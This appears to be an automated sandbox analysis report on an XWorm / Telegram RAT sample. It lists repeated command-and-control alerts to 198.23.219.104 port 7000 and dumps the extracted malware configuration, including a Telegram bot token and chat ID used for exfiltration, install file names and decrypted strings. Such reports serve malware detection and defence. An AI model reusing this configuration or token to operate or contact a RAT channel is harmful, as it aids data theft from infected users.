                      2024-10-13T19:02:40.922459+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:02:41.719945+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:02:41.830435+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:02:44.476284+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:02:49.475644+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:02:51.031873+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:02:51.414778+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:02:51.607964+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:02:51.613038+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:02:54.475851+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:02:59.475736+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:03:01.578611+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:03:04.491278+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:03:07.078619+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:03:07.167155+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:03:07.262861+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:03:09.428549+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:03:09.560616+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:03:14.491843+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:03:17.343599+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:03:17.442659+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:03:19.496920+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:03:22.531333+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:03:22.625393+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:03:22.670116+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:03:22.731529+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:03:22.775017+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:03:22.953957+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:03:23.050690+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:03:23.181699+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:03:24.510097+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:03:29.523241+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:03:30.500329+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:03:31.557998+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:03:32.875118+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:03:34.522772+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:03:34.652184+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:03:35.765177+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:03:38.016178+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:03:38.781406+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:03:38.878311+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:03:38.968783+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:03:38.998883+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:03:39.098223+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:03:39.194156+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:03:39.434283+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:03:39.571982+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:03:42.609049+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:03:44.108830+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:03:44.853754+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:03:44.854979+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:03:49.521847+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:03:51.484850+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:03:54.521956+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:03:58.406779+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:03:59.437502+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:03:59.630268+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:04:03.218492+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:04:04.522879+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:04:04.797907+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:04:08.751591+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:04:09.441171+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:04:09.571579+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:04:14.521346+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:04:14.937113+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:04:15.026057+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:04:15.121442+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:04:19.527105+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:04:20.312041+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:04:24.218338+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:04:24.521560+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:04:25.186626+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:04:25.248410+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:04:25.283748+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:04:25.379334+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:04:25.474766+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:04:25.529500+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:04:25.569982+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:04:26.952630+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:04:29.281141+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:04:29.521201+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:04:31.485110+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:04:34.521100+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:04:36.002479+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:04:36.039005+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:04:39.439166+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:04:39.527841+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:04:40.867167+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:04:44.520683+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:04:46.611127+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:04:49.520751+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:04:54.547630+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:04:59.524112+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:05:00.991767+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:05:01.233229+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:05:01.296063+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:05:01.321903+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:05:01.376986+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:05:01.471174+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:05:01.565956+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:05:01.749449+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:05:01.990278+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:05:03.909624+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:05:04.521062+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:05:06.842611+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:05:09.908847+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:05:09.908898+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:05:09.908933+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:05:10.057053+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:05:12.483271+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:05:14.521260+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:05:14.654711+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:05:18.032225+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:05:19.520978+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:05:24.536728+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:05:29.536508+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:05:32.877198+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:05:34.536046+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:05:39.442303+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:05:39.574643+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-13T19:01:38.390237+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:01:53.097464+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:02:07.940890+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:02:22.783942+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:02:28.832323+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:02:40.923936+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:02:41.012746+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:02:41.017723+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:02:41.725337+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:02:41.833112+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:02:51.033371+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:02:51.417035+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:02:51.514104+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:02:51.519248+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:02:51.610876+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:02:51.617084+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:03:01.580014+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:03:07.082246+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:03:07.168610+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:03:07.265092+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:03:17.348738+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:03:17.448743+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:03:22.723688+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:03:22.732441+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:03:22.776004+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:03:22.955379+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:03:23.051992+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:03:23.183461+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:03:23.279890+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:03:23.285081+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:03:30.502024+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:03:32.876891+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:03:34.653709+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:03:35.769751+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:03:38.020434+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:03:38.783111+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:03:38.879917+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:03:38.970203+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:03:39.000297+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:03:39.099952+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:03:39.195777+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:03:42.611151+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:03:44.115115+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:03:51.490292+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:03:58.414732+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:03:59.440157+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:03:59.536181+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:03:59.541481+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:04:03.221148+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:04:04.799393+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:04:08.753397+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:04:14.941337+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:04:15.027365+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:04:15.122707+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:04:20.317237+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:04:24.227813+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:04:25.189851+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:04:25.250473+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:04:25.285413+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:04:25.380984+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:04:25.476203+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:04:25.533935+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:04:25.573863+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:04:26.953644+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:04:29.282554+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:04:31.486425+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:04:36.043671+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:04:40.868044+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:04:46.612000+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:05:00.992732+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:05:01.234194+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:05:01.296893+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:05:01.472203+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:05:01.524860+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:05:01.529937+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:05:01.566864+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:05:01.750227+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:05:01.997514+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:05:03.913428+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:05:06.843482+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:05:10.058460+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:05:12.486973+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:05:14.655457+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:05:18.033934+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      2024-10-13T19:05:32.878074+020028529231Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-13T19:01:39.383490+020028528741Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:02:09.399936+020028528741Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:02:39.411926+020028528741Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:03:09.428549+020028528741Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:03:39.434283+020028528741Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:04:09.441171+020028528741Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:04:39.439166+020028528741Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:05:09.908847+020028528741Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:05:39.442303+020028528741Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-13T19:03:31.557998+020028539541Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-13T19:02:51.124679+020028531931Malware Command and Control Activity Detected192.168.2.449739198.23.219.1047000TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: 0000006F.00000002.4110701337.00000000031B1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["198.23.219.104"], "Port": "7000", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Telegram URL": "https://api.telegram.org/bot7151126433:AAGnFv8HooRtSQ_cEeb4ANUyyyQ1LbT0Ehc/sendMessage?chat_id=-1002219810475"}
                      Source: sB2ClgrGng.exe.2892.1.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7151126433:AAGnFv8HooRtSQ_cEeb4ANUyyyQ1LbT0Ehc/sendMessage"}
                      Source: C:\Users\user\AppData\Roaming\word.exeReversingLabs: Detection: 84%
                      Source: C:\Users\user\AppData\Roaming\word.exeVirustotal: Detection: 79%Perma Link
                      Source: sB2ClgrGng.exeReversingLabs: Detection: 52%
                      Source: sB2ClgrGng.exeVirustotal: Detection: 67%Perma Link
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                      Source: 15.0.bound.exe.2f0000.0.unpackString decryptor: 198.23.219.104
                      Source: 15.0.bound.exe.2f0000.0.unpackString decryptor: 7000
                      Source: 15.0.bound.exe.2f0000.0.unpackString decryptor: <123456789>
                      Source: 15.0.bound.exe.2f0000.0.unpackString decryptor: <Xwormmm>
                      Source: 15.0.bound.exe.2f0000.0.unpackString decryptor: RK New Staup
                      Source: 15.0.bound.exe.2f0000.0.unpackString decryptor: USB.exe
                      Source: 15.0.bound.exe.2f0000.0.unpackString decryptor: %AppData%
                      Source: 15.0.bound.exe.2f0000.0.unpackString decryptor: word.exe
                      Source: 15.0.bound.exe.2f0000.0.unpackString decryptor: 7151126433:AAGnFv8HooRtSQ_cEeb4ANUyyyQ1LbT0Ehc
                      Source: 15.0.bound.exe.2f0000.0.unpackString decryptor: -1002219810475
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0A901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,84_2_00007FF71F0A901C
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49738 version: TLS 1.2
                      Source: sB2ClgrGng.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                      Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: sB2ClgrGng.exe, 00000001.00000002.2197225283.00007FFDFB442000.00000040.00000001.01000000.00000004.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: sB2ClgrGng.exe, 00000001.00000002.2194820535.00007FFDF865F000.00000040.00000001.01000000.00000016.sdmp
                      Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: sB2ClgrGng.exe, 00000001.00000002.2195488929.00007FFDFADE1000.00000040.00000001.01000000.0000000F.sdmp
                      Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: sB2ClgrGng.exe, 00000001.00000002.2198558047.00007FFDFF214000.00000040.00000001.01000000.00000010.sdmp
                      Source: Binary string: n.pdb source: powershell.exe, 00000033.00000002.2006716977.000001F23D140000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: sB2ClgrGng.exe, 00000000.00000003.1756191157.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2201961884.00007FFE148D3000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
                      Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: sB2ClgrGng.exe, 00000001.00000002.2195488929.00007FFDFAD49000.00000040.00000001.01000000.0000000F.sdmp
                      Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: sB2ClgrGng.exe, 00000000.00000003.1756191157.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2201961884.00007FFE148D3000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
                      Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: sB2ClgrGng.exe, sB2ClgrGng.exe, 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp
